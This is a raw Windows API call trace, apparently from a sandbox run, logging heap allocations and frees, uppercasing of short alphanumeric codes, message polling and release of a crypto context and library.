RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.486] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.486] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.486] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.486] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.487] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.487] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.487] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.487] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.487] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.487] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.487] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.488] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.488] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.488] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.488] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.488] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.488] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.489] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.489] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.489] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.490] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.490] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0251.490] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.490] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.490] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.490] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.490] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.490] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.490] FreeLibrary (hLibModule=0x74d40000) returned 1 [0251.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.490] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0251.490] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.492] CloseHandle (hObject=0x1f8) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0251.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0251.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0251.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 